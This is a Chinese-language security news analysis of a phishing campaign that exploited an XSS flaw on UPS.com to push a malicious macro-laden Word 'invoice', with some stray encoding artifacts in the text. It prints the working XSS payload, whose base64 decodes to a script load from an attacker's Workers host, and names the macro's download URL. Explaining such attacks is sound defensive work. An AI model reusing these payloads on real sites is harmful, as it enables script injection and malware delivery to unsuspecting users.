UPS快遞公司(UPS%20Express,聯(lián)合包裹服務(wù)公司)是世界上最大的快遞承運(yùn)商與包裹遞送公司。公司創(chuàng)辦1907年��,每天在全球200多個國家和地區(qū)提供物流服務(wù)�����,年營業(yè)額超過500億美元。
網(wǎng)絡(luò)釣魚騙局最初是由安全研究人員丹尼爾·加拉格爾發(fā)現(xiàn)的�����,他假裝是一封來自UPS的電子郵件,聲稱一個包裹有“例外”,需要客戶取走�。
這次網(wǎng)絡(luò)釣魚攻擊的突出之處在于����,威脅行為者利用UPS.com的跨站攻擊漏洞�,將該網(wǎng)站的常規(guī)頁面修改為看起來像一個合法的下載頁面。
剖析%20UPS%20網(wǎng)絡(luò)釣魚騙局
這個電子郵件充滿了大量的合法鏈接�,沒有執(zhí)行惡意行為�。然而���,這個追蹤號碼是一個鏈接到UPS網(wǎng)站的鏈接���,其中包含一個XSS漏洞�����,當(dāng)頁面打開時�����,該漏洞會向瀏覽器注入惡意JavaScript。
UPS 網(wǎng)絡(luò)釣魚電子郵件
當(dāng)前無法加載圖像����,因為攻擊者的站點(diǎn)已關(guān)閉
下面可以看到用于跟蹤號碼的URL經(jīng)過清理后的版本�,原始的URL被進(jìn)一步混淆了�。
網(wǎng)絡(luò)釣魚詐騙中使用的URL
這個URL有兩個有趣的字符串用作攻擊的一部分,其中第一項是以下base64編碼的字符串:
MSBqVTU3IE4zM2QgNzAgbTRLMyA3aDE1IFVSTCA0IGwxNzdsMyBMMG45M3IgNzAgSDFEMyBuM3g3IHFVM3JZIFA0UjRNLCB5MHUgNExSMzREeSBLbjB3IFdoWSA7KQ==
base64字符串包含來自威脅參與者的注釋,該注釋有助于解釋該字符串用于使URL變長,以隱藏附加到URL末尾的XSS利用查詢參數(shù)。
1%20jU57%20N33d%2070%20m4K3%207h15%20URL%204%20l177l3%20L0n93r%2070%20H1D3%20n3x7%20qU3rY%20P4R4M,%20y0u%204LR34Dy%20Kn0w%20WhY%20;)
第二點(diǎn)是當(dāng)用戶訪問UPS.com網(wǎng)站時注入的JavaScript跨站漏洞�����。
img%20src="x"%20onerror="Function(atob("JC5nZXRTY3JpcHQoJ2h0dHBzOi8vbS5tZWRpYS1hbWF6b24ud29ya2Vycy5kZXYvanMnKQ=="))()
atob()函數(shù)中解碼的base64字符串包含Cloudflare工作人員腳本的URL��,該漏洞將加載該腳本。
$.getScript("
Gallagher在Urlscan上捕獲的Cloudflare工作人員腳本����,將導(dǎo)致UPS頁面顯示一條消息��,表明有文件正在下載。
Cloudflare 工作腳本用作 UPS XSS 攻擊的一部分
XSS漏洞注入的Cloudflare worker腳本將導(dǎo)致UPS網(wǎng)站顯示下載頁面�����,如下所示�����。
利用導(dǎo)致UPS頁面顯示下載屏幕
最終�����,該頁面將從攻擊者的Cloudflare項目下載惡意的Word文檔[VirusTotal]。
這種網(wǎng)絡(luò)釣魚活動手段非常聰明�����,因為用戶訪問URL將看到一個合法的ups.com%20URL提示下載發(fā)票��,這種策略可能會使受害者在打開發(fā)票時少一些懷疑��,認(rèn)為這是UPS的真實文件。
目前顯示�,UPS.com的跨站漏洞已經(jīng)修復(fù)�。
神秘的假“發(fā)票”文件
下載的文件名為“invoice_1Z7301XR1412220178”����,假裝是UPS的運(yùn)輸發(fā)票�����。當(dāng)打開文檔時��,所有文本都將無法讀取,并且文檔會提示用戶“啟用內(nèi)容”以正確查看它。
惡意發(fā)票word文檔
啟用后����,宏將嘗試下載文件divine-bar-3d75.visual-candy.workers.dev/blackhole.p…
但是�,此URL不再有效,因此無法查看有效負(fù)載����。
偽造的 UPS 發(fā)票中的宏
這種網(wǎng)絡(luò)釣魚騙局說明了威脅行為者在散布惡意文件時�����,不斷在發(fā)展和創(chuàng)新其技術(shù)手段,雖然郵件發(fā)送者清楚地顯示了一個可疑域名����,但由XSS漏洞允許URL和下載頁面從UPS合法出現(xiàn)�,這會讓很多人信以為真��。
根據(jù)CNVD(國家信息安全漏洞共享平臺)統(tǒng)計���,軟件漏洞比例最高占全部網(wǎng)絡(luò)漏洞的80%�,而在OWASP TOP 10安全漏洞中����,60-70%的安全漏洞類型都是通過源代碼靜態(tài)分析技術(shù)檢測出來的,如XSS�、注入漏洞、XXE等。而以上釣魚攻擊利用的XSS是OWASP TOP 10中第二普遍的安全問題�,存在于近三分之二的應(yīng)用中�。自動化技術(shù)可以自動發(fā)現(xiàn)一些XSS問題��,特別是在一些成熟的技術(shù)中��,如PHP、ASP.NET等。因此在軟件開發(fā)過程中,為了加強(qiáng)網(wǎng)絡(luò)安全建設(shè)提高軟件安全性���,有必要通過靜態(tài)代碼檢測等工具檢測代碼缺陷及運(yùn)行時缺陷,并查找更多的已知/未知深度安全漏洞并及時修復(fù),這不但為現(xiàn)有的網(wǎng)絡(luò)防護(hù)手段做好重要補(bǔ)充����,而且也能將安全問題修復(fù)成本降至最低����。
參讀鏈接:
www.woocoom.com/b021.html?i…
www.bleepingcomputer.com/news/securi…
www.99lb.net/8382b.html
